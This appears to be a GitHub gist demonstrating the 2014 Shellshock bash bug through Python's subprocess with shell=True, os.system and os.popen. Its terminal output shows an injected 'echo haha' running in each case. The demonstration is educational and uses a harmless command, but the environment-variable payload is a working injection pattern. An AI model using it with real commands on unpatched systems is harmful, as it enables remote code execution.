Created
September 25, 2014 23:27
-
-
Save zbuc/4591dbe8b2bac36552e7 to your computer and use it in GitHub Desktop.
Python shellshock example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# python subprocess calls using shell=True | |
# are vulnerable to shellshock... | |
bash-3.2$ cat test.py | |
#!/usr/bin/env python | |
import subprocess | |
subprocess.call(["/bin/ls"], shell=True) | |
bash-3.2$ python test.py | |
hax.txt test.py | |
bash-3.2$ lol='() { :;}; echo "haha"' python test.py | |
haha | |
hax.txt test.py |
os.system
and os.popen
will also invoke the default system shell...
bash-3.2$ cat test3.py
#!/usr/bin/env python
import os
os.system("/bin/ls")
bash-3.2$ lol='() { :;}; echo "haha"' python test3.py
haha
hax.txt test.py test2.py test3.py test4.py
bash-3.2$ cat test4.py
#!/usr/bin/env python
import os
print os.popen("/bin/ls").read()
bash-3.2$ lol='() { :;}; echo "haha"' python test4.py
haha
hax.txt
test.py
test2.py
test3.py
test4.py
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Those without shell=True are not vulnerable, of course, as Python doesn't spawn your shell to run the process: